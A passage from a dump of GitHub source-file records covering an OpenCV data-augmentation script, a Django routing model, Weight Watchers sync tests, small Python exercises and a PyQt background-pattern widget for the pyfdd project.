或者是 jpg,png 等就放进去\n if os.path.isfile(os.path.join(folder_path, file_name)):\n _, file_type = os.path.splitext(file_name)\n if file_type in {'.xml'}:\n xmls.append(file_name)\n return xmls\n\n\n# Python读取一个目录下的所有文件\ndef printPath(level, path):\n global allFileNum\n ''''' \n 打印一个目录下的所有文件夹和文件 \n '''\n # 所有文件夹,第一个字段是次目录的级别\n dirList = []\n # 所有文件\n fileList = []\n # 返回一个列表,其中包含在目录条目的名称(google翻译)\n files = os.listdir(path)\n # 先添加目录级别\n dirList.append(str(level))\n for f in files:\n if os.path.isdir(path + '/' + f):\n # 排除隐藏文件夹。因为隐藏文件夹过多\n if f[0] == '.':\n pass\n else:\n # 添加非隐藏文件夹\n dirList.append(f)\n if os.path.isfile(path + '/' + f):\n # 添加文件\n fileList.append(f)\n # 当一个标志使用,文件夹列表第一个级别不打印\n i_dl = 0\n for dl in dirList:\n if i_dl == 0:\n i_dl = i_dl + 1\n else:\n # 打印至控制台,不是第一个的目录\n print('- ' * (int(dirList[0])), dl)\n # 打印目录下的所有文件夹和文件,目录级别+1\n printPath((int(dirList[0]) + 1), path + '/' + dl)\n for fl in fileList:\n # 打印文件\n print('- ' * (int(dirList[0])), fl)\n # 随便计算一下有多少个文件\n allFileNum = allFileNum + 1\n\n\n# 保存图片,加上图片的四边作为描述信息存储,如果是保存原图就先不处理 顶点信息\ndef save_img(save_dir: str, img: np.array, points=None):\n # save_dir = os.path.dirname(img_path)\n # if not os.path.exists(os.path.dirname(save_path)):\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n k = len(os.listdir(save_dir))\n img_path = os.path.join(save_dir, str(k) + '.jpg')\n cv2.imwrite(img_path, img)\n if 'pic_classes' not in save_dir:\n json_dir = os.path.join(save_dir, 'json')\n if not os.path.exists(json_dir):\n os.mkdir(json_dir)\n if points is not None:\n h, w = img.shape[0:2]\n points = [[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]]\n # rr = cv2.fillPoly(img, [np.array(points, dtype=np.int32)], 255)\n # cv2.imshow('rrrrrrr', rr)\n json_path = os.path.join(json_dir, str(k) + '.json')\n with open(json_path, 'w', encoding='utf8') as fp:\n fp.write(json.dumps({'points': points}))\n\n\ndef background_target_generator(img_path, save_folder, type_tangels):\n \"\"\"\n 把目标区域扣出来,把扣掉目��区域后的背景找出来\n :param img_path: 来源图片路径\n :param save_folder: 生成图片的保存路径\n :param type_tangels: 【[detection_type, xmin, ymin, xmax, ymax],】形式的一个数组\n :return: None\n \"\"\"\n cur_img = cv2.imread(img_path)\n # h, w = cur_img.shape[0:2]\n # print('h, w',cur_img.shape)\n # 扣背景的掩码\n # mask = np.ones(cur_img.shape)\n for rec in type_tangels:\n # rec 形式: [detection_type, xmin, ymin, xmax, ymax]\n xmin, ymin, xmax, ymax = rec[1:5]\n # 根据 xmin,ymin,xmax,ymax 裁剪图片,抠出来,然后保存\n target_img = cur_img[ymin:ymax, xmin:xmax]\n save_dir = os.path.join(save_folder, rec[0])\n cv2.imshow('target_img', target_img)\n save_img(save_dir, target_img)\n # TODO 填充被扣掉的这些区域, 这一部分效果不太好,需要 看看别人的算法咯!\n # y1, y2 = ymin, ymax\n # step = 1\n # while y1 < y2:\n # if ymin - k >= 0:\n # cur_img[y1:y1 + k, xmin:xmax] = cur_img[ymin - k:ymin, xmin:xmax]\n # y1 = y1 + k\n # if ymax + k < h:\n # cur_img[y2 - k:y2, xmin:xmax] = cur_img[ymax:ymax + k, xmin:xmax]\n # y2 = y2 - k\n # step <<= 2\n # w_, h_ = xmax - xmin, ymax - ymin\n # w1, w2, h1, h2 = max(0, xmin - w_ // 2), min(w - 1, xmax + w_ // 2), max(0, ymin - h_ // 2), min(h - 1, ymax + h_ // 2)\n # cur_img[h1:h2, w1:w2] = cv2.medianBlur(cur_img[h1:h2, w1:w2], 3)\n cur_img[ymin:ymax, xmin:xmax] = 0 # 把图扣了后,原图就置为 黑色0了\n cv2.waitKey()\n save_img(save_folder + 'background/', cur_img)\n\n\ndef augmentation(save_dir, img_path):\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n json_dir = os.path.join(save_dir, 'json')\n if not os.path.exists(json_dir):\n os.mkdir(json_dir)\n image = cv2.imread(img_path)\n # 原图的四个顶点\n # th, tw = image.shape[0:2]\n # vertexes = np.array([(0, 0), (tw - 1, 0), (tw - 1, th - 1), (0, th - 1)], dtype=np.float32)\n # TODO 透视变换的策略\n for x in range(-45, 45, 20):\n # perspective_transform 会返回一张图,加 4 个顶点 [[x,y],]\n # 这里做一些图片的变换,需要返回变换后的图片 + 变换后图片的四个顶点坐标\n trans_img, points = perspective_transform(image, x, 0, 0)\n save_img(save_dir, trans_img)\n for y in range(-45, 45, 20):\n # perspective_transform 会返回一张图,加 4 个顶点 [[x,y],]\n # 这里做一些图片的变换,需要返回变换后的图片 + 变换后图片的四个顶点坐标\n trans_img, points = perspective_transform(image, 0, y, 0)\n save_img(save_dir, trans_img)\n # TODO flip 水平翻转 + 平移 + 缩放\n # 水平翻转: 只有 红绿灯+ 车道线 进行水平翻转。 减速标志不进行\n do_flip = []\n\n trans_img, _ = flip_x(image)\n save_img(save_dir, trans_img)\n\n # TODO scale 缩放\n\n\n# 解析 xml 文件,把其中的表示 框框的部分解析出来成 rectangles\ndef parse_xml_bboxes(xml_path):\n \"\"\"\n 解析 xml, xml 和 jpg 必须在同级目录\n :param xml_path: xml 文件的路径\n :return: rectangles :(image_path, [detection_type, xmin, ymin, xmax, ymax])\n \"\"\"\n # xml.etree.ElementTree 可以直接从文件中解析 xml 文件\n tree = ET.parse(xml_path)\n root = tree.getroot()\n # for child in root:\n # print(child.attrib,child.text)\n # for elem in tree.iter():\n # print(elem.tag, elem.attrib, elem.text)\n # Element.findall() 仅查找当前元素的直接子元素中带有指定标签的元素。\n # Element.find() 找带有特定标签的 第一个 子级,然后可以用 Element.text 访问元素的文本内容\n pic_name_node = root.find('filename')\n pic_name = pic_name_node.text\n # 这里处理德江留下来的坑。\n _, xml_name = os.path.split(xml_path)\n if xml_name.startswith('x') and not pic_name.startswith('x'):\n pic_name = 'x' + pic_name\n rectangles = []\n # 遍历所有 object\n for obj in root.findall('object'):\n detection_type = obj.find('name').text\n xmin = int(obj.find('bndbox').find('xmin').text)\n ymin = int(obj.find('bndbox').find('ymin').text)\n xmax = int(obj.find('bndbox').find('xmax').text)\n ymax = int(obj.find('bndbox').find('ymax').text)\n rectangles.append([detection_type, xmin, ymin, xmax, ymax])\n return os.path.join(os.path.dirname(xml_path), pic_name), rectangles\n\n\ndef my_augmentation(imgs_folder, save_expand, names):\n if not os.path.exists(save_expand):\n os.mkdir(save_expand)\n cnt = 0 # 记录一下一起生成了多少图片\n xml_names = []\n for file in names:\n print('-' * 8 + ' 进程 ' + str(os.getpid()) + ' 正在处理 ' + '-' * 2 + file + '-' * 3)\n res_list = []\n # rectangles :[ [detection_type, xmin, ymin, xmax, ymax],]\n # xml 和 jpg 必须在同级目录\n pic_path, rectangles = parse_xml_bboxes(os.path.join(imgs_folder, file))\n bboxes = list(map(lambda x: [x[1], x[2], x[3], x[4]], rectangles))\n labels = list(map(lambda x: x[0], rectangles))\n # 做一下翻转看看 flip_x 要求传入的 boxes 格式: [ [[x,y],[x,y]], [[x,y],[x,y]]……]\n # 翻转只针对斑马线,红绿灯,如果包含 限速就不翻转了\n no_need_flip_class_names = {\"speed_limited\", \"speed_unlimited\"}\n CROP_NUMS = 10 # 使用 放大 裁剪 需要生成多少张图\n if not set(labels) & no_need_flip_class_names: # 交集为空,就说明不存在了 限速标,可以翻转\n flip_img, flip_boxes = flip_x(pic_path, list(map(lambda x: [[x[1], x[2]], [x[3], x[4]]], rectangles)))\n # 展示一下\n # draw_image = draw_boxes_with_labels(flip_img, flip_boxes, labels)\n # cv2.imshow(\"draw_image\", draw_image)\n # 保存,翻转不影响 labels\n res_list.append([flip_img, flip_boxes, labels])\n # 翻转了后,也再做一下裁剪扩充数据吧\n flip_crop_scale_res_list = crop_scale(flip_img, flip_boxes, labels, nums=CROP_NUMS)\n res_list.extend(flip_crop_scale_res_list)\n # 这里做一下 放大后裁剪,返回的是 nums 个图片+bboxes+labels: 【[image,bboxes,labels],[image,bboxes,labels]……】\n crop_scale_res_list = crop_scale(pic_path, bboxes, labels, nums=CROP_NUMS)\n res_list.extend(crop_scale_res_list)\n # 保存 图片 + bboxes + label 成个 jgp + xml 格式\n for res_image, res_boxes, res_labels in res_list:\n xml_name = save_jpg_xml(save_expand, res_image, res_boxes, res_labels)\n xml_names.append(xml_name)\n cnt += len(res_list)\n return cnt, xml_names\n\n\nif __name__ == '__main__':\n import time\n\n start_time = time.time()\n save_folder = './pic_classes/'\n # imgs_folder = './photo/'\n imgs_folder = r'D:\\car_data_origin\\data_7_22'\n # imgs_folder = r'D:\\car_data_origin\\test'\n # save_expand = './expand'\n save_expand = r'D:\\car_data'\n # 引入多进程加快速度\n from multiprocessing import cpu_count\n from multiprocessing import Pool\n\n CPU_COUNT = cpu_count() # CPU内核数 本机为 6\n pool = Pool(processes=CPU_COUNT)\n # printPath(1, './photo/')\n # print('总文件数 =', allFileNum)\n # file_names = get_all_jgp_xml_couple(imgs_folder)\n file_names = get_all_xmls(imgs_folder)\n N = len(file_names)\n sepList = [[i * (N // CPU_COUNT), (i + 1) * (N // CPU_COUNT)] for i in range(0, CPU_COUNT)]\n sepList[CPU_COUNT - 1][1] = N\n print(sepList)\n\n result = []\n for i in range(CPU_COUNT):\n # TODO 保存为文件的名字,我想要用共享变量来做,现在是通过不同的进行保存在不同的文件夹,有点笨,这个需要增加共享变量来处理\n result.append(pool.apply_async(my_augmentation,\n (imgs_folder, os.path.join(save_expand, str(i)),\n file_names[sepList[i][0]:sepList[i][1]])))\n pool.close()\n pool.join()\n list1 = [res.get()[0] for res in result]\n print(sum(list1), end='') # end='' 表示取消 /n\n \"\"\"\n cnt = 0 # 记录一下一起生成了多少图片\n for i, file in enumerate(file_names):\n res_list = []\n # rectangles :[ [detection_type, xmin, ymin, xmax, ymax],]\n # xml 和 jpg 必须在同级目录\n pic_path, rectangles = parse_xml_bboxes(os.path.join(imgs_folder, file))\n bboxes = list(map(lambda x: [x[1], x[2], x[3], x[4]], rectangles))\n labels = list(map(lambda x: x[0], rectangles))\n # 做一下翻转看看 flip_x 要求传入的 boxes 格式: [ [[x,y],[x,y]], [[x,y],[x,y]]……]\n # 翻转只针对斑马线,红绿灯,如果包含 限速就不翻转了\n no_need_flip_class_names = {\"speed_limited\", \"speed_unlimited\"}\n CROP_NUMS = 10 # 使用 放大 裁剪 需要生成多少张图\n if not set(labels) & no_need_flip_class_names: # 交集为空,就说明不存在了 限速标,可以翻转\n flip_img, flip_boxes = flip_x(pic_path, list(map(lambda x: [[x[1], x[2]], [x[3], x[4]]], rectangles)))\n # 展示一下\n # draw_image = draw_boxes_with_labels(flip_img, flip_boxes, labels)\n # cv2.imshow(\"draw_image\", draw_image)\n # 保存,翻转不影响 labels\n res_list.append([flip_img, flip_boxes, labels])\n # 翻转了后,也再做一下裁剪扩充数据吧\n flip_crop_scale_res_list = crop_scale(flip_img, flip_boxes, labels, nums=CROP_NUMS)\n res_list.extend(flip_crop_scale_res_list)\n # 这里做一下 放大后裁剪,返回的是 nums 个图片+bboxes+labels: 【[image,bboxes,labels],[image,bboxes,labels]……】\n crop_scale_res_list = crop_scale(pic_path, bboxes, labels, nums=CROP_NUMS)\n res_list.extend(crop_scale_res_list)\n # 保存 图片 + bboxes + label 成个 jgp + xml 格式\n for res_image, res_boxes, res_labels in res_list:\n save_jpg_xml(save_expand, res_image, res_boxes, res_labels)\n cnt += len(res_list)\n # for i, (res_image, res_boxes, res_labels) in enumerate(res_list):\n # # 显示出来看看\n # print('res_boxes', res_boxes)\n # image = draw_boxes_with_labels(res_image, res_boxes, res_labels)\n # cv2.imshow('after_draw_' + str(i), image)\n # 切割数据,把背景切到 pic_classes/background ,把labels 切到对应 label 名的目录pic_classes/'$label'\n # TODO 这个 部分先暂时不弄了 这个是准备用来抠图然后贴上去搞\n # background_target_generator(pic_path, save_folder, rectangles)\n # 调用数据增强方法\n generator_dir = './generator'\n for folder in os.listdir(save_folder):\n if folder == 'background':\n break\n target_label_folder = os.path.join(save_folder, folder)\n for image_name in os.listdir(target_label_folder):\n target_image_path = os.path.join(target_label_folder, image_name)\n label_generator_dir = os.path.join(generator_dir, folder)\n if not os.path.exists(label_generator_dir):\n os.mkdir(label_generator_dir)\n # augmentation(label_generator_dir, target_image_path)\n cv2.destroyAllWindows()\n print('-' * 10 + ' done ' + '-' * 5 + ' gennerate ' + str(cnt) + ' images' + '-' * 3)\n \"\"\"\n end_time = time.time()\n print('Running time: %s Seconds' % (end_time - start_time))\n","repo_name":"Max-PJB/python-learning","sub_path":"opencv_learn/cv_utils.py","file_name":"cv_utils.py","file_ext":"py","file_size_in_byte":17289,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1554051039","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils import timezone\nfrom server_data_conf.models.cluster_conf import ClusterConfig\nfrom product.models import Product\nfrom django.conf import settings\nimport json\nimport os\n\n\nclass RouteRuleQuerySet(models.QuerySet):\n pass\n\n\nclass RouteRuleManager(models.Manager):\n def get_queryset(self):\n return RouteRuleQuerySet(self.model, using=self._db)\n\n def get_by_id(self, id):\n return self.get_queryset().filter(id=id).first()\n\n def json(self):\n res = {}\n for v in self.get_queryset().filter(Enabled=True):\n if v.Porduct.Name in res.keys():\n res[v.Porduct.Name].append(v.json())\n else:\n res[v.Porduct.Name] = [\n v.json()\n ]\n return res\n\n\nclass RouteRule(models.Model):\n Porduct = models.ForeignKey(Product, verbose_name=_('Porduct'), on_delete=models.CASCADE)\n ClusterName = models.OneToOneField(ClusterConfig, verbose_name=_('ClusterName'), on_delete=models.CASCADE)\n Cond = models.CharField(_('Cond'), max_length=64)\n\n Enabled = models.BooleanField(default=True)\n CreateDate = models.DateTimeField(_('Create Date'), default=timezone.now)\n\n objects = RouteRuleManager()\n\n # ClusterName = models.OneToOneField\n def __str__(self):\n return self.Porduct.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n\n def disable(self):\n self.Enabled = False\n self.save()\n\n def enable(self):\n self.Enabled = True\n self.save()\n\n def json(self):\n return {\n \"Cond\": self.Cond,\n \"ClusterName\": self.ClusterName.ClusterName,\n }\n\n class Meta:\n db_table = 'RouteRule'\n verbose_name = _('Route Rule')\n verbose_name_plural = _('Route Rule')\n\n def save(self, *args, **kwargs):\n if not self.pk:\n try:\n p = RouteRule.objects.get(id=self.id)\n self.pk = p.pk\n except RouteRule.DoesNotExist:\n pass\n\n super(RouteRule, self).save(*args, **kwargs)\n\n\nclass RouteRuleDataQuerySet(models.QuerySet):\n pass\n\n\nclass RouteRuleDataManager(models.Manager):\n def get_queryset(self):\n return RouteRuleDataQuerySet(self.model, using=self._db)\n\n def get_by_id(self, id):\n return self.get_queryset().filter(id=id).first()\n\n def tofile(self, id):\n data = self.get_queryset().filter(id=id).first()\n if data:\n s = data.json()\n else:\n s = {\n \"Version\": \"nil\",\n \"ProductRule\": {},\n }\n with open(os.path.join(settings.BASE_DIR, 'conf', 'server_data_conf', 'route_rule.data'), 'w')as file:\n file.write(json.dumps(s))\n\n\nclass RouteRuleData(models.Model):\n Name = models.CharField(_('Name'), max_length=64)\n RouteRule = models.ManyToManyField(RouteRule, verbose_name=_('RouteRule'))\n Enabled = models.BooleanField(default=True)\n CreateDate = models.DateTimeField(_('Create Date'), default=timezone.now)\n\n objects = RouteRuleDataManager()\n\n def __str__(self):\n if self.Enabled:\n return self.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n else:\n return \"!!!Disabled_\" + self.Name + \"_\" + self.CreateDate.strftime('%Y-%m-%d %H:%M:%S')\n\n class Meta:\n db_table = 'RouteRuleData'\n verbose_name = _('Route Rule Data')\n verbose_name_plural = _('Route Rule Data')\n\n def save(self, *args, **kwargs):\n if self.Enabled:\n RouteRuleData.objects.filter(Name=self.Name, Enabled=True).update(Enabled=False)\n if not self.pk:\n try:\n p = RouteRuleData.objects.get(id=self.id)\n self.pk = p.pk\n except RouteRuleData.DoesNotExist:\n pass\n\n super(RouteRuleData, self).save(*args, **kwargs)\n\n def json(self):\n res = {}\n for v in self.RouteRule.filter(Enabled=True):\n if v.Porduct.Name in res.keys():\n res[v.Porduct.Name].append(v.json())\n else:\n res[v.Porduct.Name] = [\n v.json()\n ]\n return {\n \"Version\": self.__str__(),\n \"ProductRule\": res,\n }\n\n def tofile(self):\n with open(os.path.join(settings.BASE_DIR, 'conf', 'server_data_conf', 'route_rule.data'), 'w')as file:\n file.write(json.dumps(self.json()))\n","repo_name":"power-ops/BFE-UI","sub_path":"bfe/server_data_conf/models/route_rule.py","file_name":"route_rule.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"16514894912","text":"import datetime\nimport json\n\nimport vcr\nfrom tests.conftest import CASSETTES_HOME, FIXTURES_HOME\nfrom wwsync.weight_watchers import get_foods_for_day, get_nutrition, WW_FOOD, get_food_detail, WW_RECIPE, \\\n get_nutrition_info_for_day\n\n\ndef test_get_food_for_week(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'food_for_2016_02_12')):\n foods = get_foods_for_day(session, datetime.datetime(2016, 2, 12))\n assert len(foods) == 15\n # These are the keys I expect\n food = foods[0]\n assert all(x in food for x in ['_id', 'versionId', 'portionName', 'portionSize'])\n\n\ndef test_get_calories_ww_defined_food(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'egg_log.yaml')):\n # This object is actually quite more complicated. But I don't care\n food_log = {'portionId': '563c6669305d6e1834ab948d', 'sourceId': 58783, '_displayName': 'Egg(s)',\n 'sourcePortionName': 'serving(s)', 'points': 4, 'isCore': True, 'name': 'Egg(s)',\n 'entryId': 'ee1e26a0-4e37-11e6-8aa7-21442c64eff3', 'smartPointsPrecise': 2.0201, 'timeOfDay': 'morning',\n 'sourcePortionId': 9, 'versionId': '563c6669305d6e1834ab9485', 'smartPoints': 4, 'portionTypeId': 800,\n 'isActive': True, 'portionName': 'item(s)', 'portionSize': 2, 'isPowerFood': True, 'trackedDate': '2016-07-20',\n 'sourceType': WW_FOOD, '_servingDesc': '2 item(s)', '_id': '561dcbbae33175473413d475',\n 'pointsPrecise': 1.8347}\n food_detail = get_food_detail(session, food_log)\n result = get_nutrition(food_detail, food_log)\n assert result == {\n 'calories': 144.0,\n 'sodium': 142.0,\n 'saturatedFat': 3.12,\n 'carbs': 0.72,\n 'sugar': 0.36,\n 'fat': 9.5,\n 'protein': 12.56\n }\n\n\ndef test_get_calories_ww_recipe(session):\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'steak_recipe.yaml')):\n # This object is actually quite more complicated. But I don't care\n food_log = {'smartPoints': 4, '_servingDesc': '1 serving(s)',\n '_displayName': 'Coffee-Chili Rubbed Flank Steak with Peppers and Onions', 'trackedDate': '2016-07-20',\n 'pointsPrecise': 4.8926, 'portionSize': 1, 'isActive': True, 'entryId': '6fc42740-4e38-11e6-8237-3d072975d999',\n 'points': 5, 'sourceId': 523991, 'smartPointsPrecise': 4, 'portionName': 'serving(s)',\n 'name': 'Coffee-Chili Rubbed Flank Steak with Peppers and Onions', 'portionTypeId': None,\n 'versionId': '57516df7f9984a6a3682ac0d', '_id': '57516df7f9984a6a3682ac0c', 'timeOfDay': 'morning',\n 'sourcePortionName': 'serving(s)', 'sourcePortionId': None, 'sourceType': WW_RECIPE, 'portionId': None}\n result = get_nutrition(get_food_detail(session, food_log), food_log)\n assert result == {\n 'sodium': 1089.58948,\n 'protein': 26.27602775,\n 'fiber': 2.48177325,\n 'fat': 7.102034249999999,\n 'sugar': 3.51908025,\n 'saturatedFat': 2.4551232499999998,\n 'carbs': 7.944517,\n 'calories': 201.15632675\n }\n\n\ndef test_day_in_life(username, password):\n with open(\"{}/{}\".format(FIXTURES_HOME, 'food_for_day.json')) as infile:\n expected = json.loads(infile.read())\n with vcr.use_cassette(\"{}/{}.yaml\".format(CASSETTES_HOME, 'day_in_life.yaml')):\n result = get_nutrition_info_for_day(username, password, datetime.datetime(2016, 2, 21))\n assert expected == result\n","repo_name":"Bachmann1234/weight-watchers-sync","sub_path":"tests/test_weight_watchers.py","file_name":"test_weight_watchers.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"4982603903","text":"# 문자열을 n개 단위로 잘라 최솟값을 리턴해야 함.\n\nfrom collections import deque\ndef solution(s):\n answer = 0\n \n # 문자열 s를 deque로 바꿈.\n LENGTH = len(s)\n \n for i in range(1, LENGTH):\n splited_s_dq = [ s[size:size + i] for size in range(0, LENGTH, i) ]\n # n개 단위로 잘라내는 작업.\n # range의 3번째 인자는 숫자 사이의 거리\n # splited_s_dq라는 리스트를 만들어서 리스트컨프리헨젼으로 n개 단위로 나눈 값으로 초기화\n temp = []\n splited_s_dq = deque(splited_s_dq)\n \n for i in range(1, len(splited_s_dq)):\n if splited_s_dq[i] == splited_s_dq[i - 1]:\n answer += 1\n # 이전 문자와 동일하다면.\n else:\n continue\n print(answer)\n return answer\n\nprint(solution(\"aabbaccc\"))\n# print(solution(\"ababcdcdababcdcd\"))\n# print(solution(\"abcabcabcabcdededededede\"))\n# print(solution(\"xababcdcdababcdcd\"))\n","repo_name":"dongkyu92/TIL","sub_path":"Python/Algorithm/문자열 압축.py","file_name":"문자열 압축.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15613952043","text":"def factorial (x):\r\n result = 1\r\n for i in range(2,x+1):\r\n result=result*i\r\n return result\r\n\r\na=int(input())\r\nb=int(input())\r\n\r\nresult = factorial(a)/factorial(b)\r\nprint(f\"{result:.2f}\")","repo_name":"olgayordanova/PythonFundamental","sub_path":"Function/FactorialDivision.py","file_name":"FactorialDivision.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"703222961","text":"import sys\nimport os\nimport warnings\nfrom enum import Enum, IntEnum\nimport numpy as np\nimport json\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic, sip\n# from PySide2 import QtCore, QtGui, QtWidgets, uic\n\nimport pyfdd\n\n# Load the ui created with PyQt creator\n# First, convert .ui file to .py with,\n# pyuic5 datapattern_widget.ui -o datapattern_widget.py\n# import with absolute import locations\nfrom pyfdd.gui.qt_designer.bkgtools_widget import Ui_BkgToolsWidget\nfrom pyfdd.gui.qt_designer.corrfactor_dialog import Ui_CorrFactorDialog\nfrom pyfdd.gui.datapattern_interface import DataPattern_window, DataPatternControler\n\nimport pyfdd.gui.config as config\n\n\nclass CorrFactor_dialog(QtWidgets.QDialog, Ui_CorrFactorDialog):\n def __init__(self, parent_widget, corr_factor, bkg_counts=None):\n super(CorrFactor_dialog, self).__init__(parent_widget)\n self.setupUi(self)\n if bkg_counts is not None:\n bkg_counts = int(bkg_counts)\n\n self.corr_factor = corr_factor\n self.bkg_counts = bkg_counts if bkg_counts is not None else 0 if not config.parser.has_option('bkgpattern', 'bkg_counts') else \\\n config.getlist('bkgpattern', 'bkg_counts')\n self.bkg_time = 3600 if not config.parser.has_option('bkgpattern','bkg_time') else \\\n config.getlist('bkgpattern', 'bkg_time')\n self.data_counts = 1000000 if not config.parser.has_option('bkgpattern','data_counts') else \\\n config.getlist('bkgpattern', 'data_counts')\n self.data_time = 3600 if not config.parser.has_option('bkgpattern', 'data_time') else \\\n config.getlist('bkgpattern', 'data_time')\n\n self.le_data_time.setText(str(self.data_time))\n self.le_data_counts.setText(str(self.data_counts))\n self.le_bkg_time.setText(str(self.bkg_time))\n self.le_bkg_counts.setText(str(self.bkg_counts))\n self.le_factor.setText(str(self.corr_factor))\n\n validator0 = QtGui.QDoubleValidator(bottom=0)\n validator0.setLocale(QtCore.QLocale(\"en_US\"))\n validator1 = QtGui.QDoubleValidator(bottom=1)\n validator1.setLocale(QtCore.QLocale(\"en_US\"))\n self.le_data_time.setValidator(validator0)\n self.le_data_counts.setValidator(validator0)\n self.le_bkg_time.setValidator(validator0)\n self.le_bkg_counts.setValidator(validator0)\n self.le_factor.setValidator(validator1)\n\n self.pb_calculate.clicked.connect(self.call_pb_calculate)\n self.buttonBox.clicked.connect(self.closeEvent)\n\n def call_pb_calculate(self):\n self.data_time = float(self.le_data_time.text())\n self.data_counts = float(self.le_data_counts.text())\n self.bkg_time = float(self.le_bkg_time.text())\n self.bkg_counts = float(self.le_bkg_counts.text())\n\n try:\n factor = pyfdd.BackgroundTools.calculate_factor(data_time=self.data_time, data_cts=self.data_counts,\n bkg_time=self.bkg_time, bkg_cts=self.bkg_counts)\n except Exception as e:\n QtWidgets.QMessageBox.warning(self, 'Warning message', str(e))\n return\n\n self.corr_factor = factor\n self.le_factor.setText(str(self.corr_factor))\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self.data_time = float(self.le_data_time.text())\n self.data_counts = float(self.le_data_counts.text())\n self.bkg_time = float(self.le_bkg_time.text())\n self.bkg_counts = float(self.le_bkg_counts.text())\n self.corr_factor = float(self.le_factor.text())\n\n config.parser['bkgpattern']['data_time'] = str(self.data_time)\n config.parser['bkgpattern']['data_counts'] = str(self.data_counts)\n config.parser['bkgpattern']['bkg_time'] = str(self.bkg_time)\n config.parser['bkgpattern']['bkg_counts'] = str(self.bkg_counts)\n\n if isinstance(event, QtGui.QCloseEvent):\n event.accept()\n\n\nclass BkgTools_groupbox(QtWidgets.QWidget, Ui_BkgToolsWidget):\n\n def __init__(self, parent_widget):\n super(BkgTools_groupbox, self).__init__(parent_widget)\n self.setupUi(self)\n\n\nclass BkgPattern_window(QtWidgets.QMainWindow):\n \"\"\" Class to use the data pattern widget in a separate window\"\"\"\n def __init__(self, *args, **kwargs):\n super(BkgPattern_window, self).__init__(*args, **kwargs)\n\n # Load configuration\n if config.parser is None:\n config.filename = 'bkgpattern_config.ini'\n config.read()\n\n # Set up the window\n self.window_title = \"Background Pattern\"\n self.setWindowTitle(self.window_title)\n self.statusBar()\n\n # Set a BkgPattern widget as central widget\n self.bp_w = BkgPattern_widget(mainwindow=self)\n self.setCentralWidget(self.bp_w)\n self.resize(1150, 670)\n\n # Connect signals\n self.bp_w.datapattern_changed.connect(self.title_update)\n self.bp_w.datapattern_saved.connect(self.title_update)\n\n def set_datapattern(self, datapattern):\n self.bp_w.set_datapattern(datapattern)\n\n def title_update(self):\n if self.bp_w.are_changes_saved() is False:\n if self.window_title[-1] == \"*\":\n pass\n else:\n self.window_title = self.window_title + '*'\n else:\n if self.window_title[-1] == \"*\":\n self.window_title = self.window_title[0:-1]\n self.setWindowTitle(self.window_title)\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n config.write()\n\n\nclass BkgPattern_widget(pyfdd.gui.datapattern_interface.DataPattern_widget):\n \"\"\" Data pattern widget class\"\"\"\n\n #datapattern_opened = QtCore.pyqtSignal()\n #datapattern_changed = QtCore.pyqtSignal()\n #datapattern_saved = QtCore.pyqtSignal()\n\n def __init__(self, *args, mainwindow=None, **kwargs):\n \"\"\"\n Init method for the data pattern widget\n :param args:\n :param mainwindow: Main window object\n :param kwargs:\n \"\"\"\n\n super(BkgPattern_widget, self).__init__(*args, mainwindow=mainwindow, **kwargs)\n\n # Remove widgets\n self.gridLayout_4.removeWidget(self.pb_orientchanneling)\n self.gridLayout_4.removeWidget(self.pb_editorientation)\n self.gridLayout_4.removeWidget(self.pb_fitrange)\n self.pb_orientchanneling.deleteLater()\n self.pb_editorientation.deleteLater()\n self.pb_fitrange.deleteLater()\n self.pb_orientchanneling = None\n self.pb_editorientation = None\n self.pb_fitrange = None\n\n # Adapt widgets\n self.dp_menu.setTitle('Background')\n\n # Add background tools\n self.bkgtools = BkgTools_groupbox(parent_widget=self)\n self.verticalLayout_2.insertWidget(3, self.bkgtools)\n\n # Popup widgets that need a reference in self\n self.dp_external = []\n\n # Set config section\n if not config.parser.has_section('bkgpattern'):\n config.parser.add_section('bkgpattern')\n\n default_is_enabled = True if not config.parser.has_option('bkgpattern', 'is_enabled') else \\\n config.getboolean('bkgpattern', 'is_enabled')\n default_corr_factor = 1 if not config.parser.has_option('bkgpattern', 'corr_factor') else \\\n config.getlist('bkgpattern', 'corr_factor')\n default_smooth_sigma = 0 if not config.parser.has_option('bkgpattern', 'smooth_sigma') else \\\n config.getlist('bkgpattern', 'smooth_sigma')\n\n # Variables\n self.is_enabled = default_is_enabled\n self.corr_factor = default_corr_factor\n self.smooth_sigma = default_smooth_sigma\n\n self.bkgtools.cb_enabled.setChecked(self.is_enabled)\n self.bkgtools.le_gauss_sigma.setText(str(self.smooth_sigma))\n self.bkgtools.le_correction_factor.setText(str(self.corr_factor))\n\n # Connect signals\n # Background tools\n self.bkgtools.cb_enabled.clicked.connect(self.call_cb_enabled)\n self.bkgtools.pb_set_factor.clicked.connect(self.call_pb_set_factor)\n self.bkgtools.pb_set_sigma.clicked.connect(self.call_pb_set_sigma)\n self.bkgtools.bp_view_background.clicked.connect(self.call_p_view_background)\n\n def get_background_pattern_and_corrfactor(self):\n if not self.is_enabled:\n return None, None\n if self.datapattern is None:\n return None, None\n\n btools = pyfdd.BackgroundTools()\n btools.set_sigma(self.smooth_sigma)\n background_array = 